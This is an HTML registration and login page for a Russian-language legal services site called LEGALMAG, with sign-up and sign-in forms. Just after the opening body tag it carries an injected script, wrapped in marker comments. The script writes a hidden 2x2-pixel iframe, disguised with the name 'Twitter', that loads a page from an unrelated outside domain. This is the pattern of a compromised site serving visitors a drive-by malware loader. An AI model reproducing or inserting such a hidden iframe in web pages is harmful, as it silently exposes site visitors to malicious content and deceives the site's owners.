<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<section id="content"><!--content-->
			<div class="wrapper">
				<div id="regForm">
					<img src="design/img/logo.png" alt="LEGALMAG" class="logo">
					<div class="mainForm">
						<form>
							<p>Регистрация</p>
							<div class="youAre">
								<p>Вы регистрируетесь как:</p>
								<input type="radio" name="youAre" value="youAre-citizen" id="youAre-citizen"><label for="youAre-citizen">Гражданин</label><br>
								<input type="radio" name="youAre" value="youAre-attorney" id="youAre-attorney"><label for="youAre-attorney">Юрист, адвокат</label><br>
								<input type="radio" name="youAre" value="youAre-company" id="youAre-company"><label for="youAre-company">Юридическая компания</label>
							</div>
							<dl>
								<dt><label for="regForm-name">Имя:</label></dt>
								<dd><input type="text" name="regForm-name" id="regForm-name"></dd>
								<dt><label for="regForm-surname">Фамилия:</label></dt>
								<dd><input type="text" name="regForm-surname" id="regForm-surname"></dd>
								<dt><label for="regForm-email">E-mail:</label></dt>
								<dd><input type="email" name="regForm-email" id="regForm-email"></dd>
								<dt><label for="regForm-password">Пароль:</label></dt>
								<dd><input type="password" name="regForm-password" id="regForm-password"></dd>
								<dd><a href="">Показать пароль</a></dd>
							</dl>
							<div class="policyConfirm">
								<input type="checkbox" name="policyConfirm">
								<p>Внимание, используя настоящий сервис, Вы подтверждаете согласие соблюдать условия <a href="">Пользовательского соглашения и политики конфиденциальности</a>. Если вы не могласны, откажитесь от доступа и прекратите регистрацию.</p>
							</div>
							<div class="clear">&nbsp;</div>
							<input type="submit" class="buttonRegisterAndEnter" value="Зарегистрироваться и войти">
							<input type="checkbox" name="regForm-remember" id="regForm-remember"><label for="regForm-remember">Запомнить меня</label>
						</form>
					</div>
					<div id="enterForm">
						<form>
							<p>Уже зарегистрированы?</p>
							<label for="enterForm-email">E-mail</label><input type="email" name="enterForm-email" id="enterForm-email">
							<label for="enterForm-password">Пароль</label><input type="password" name="enterForm-password" id="enterForm-password">
							<input type="submit" class="buttonEnterForm" value="Войти в Legal Mag">
							<a href="">Восстановления пароля >></a>
						</form>
					</div>
				</div>
			</div>
		</section>
	</section>
</body>
</html>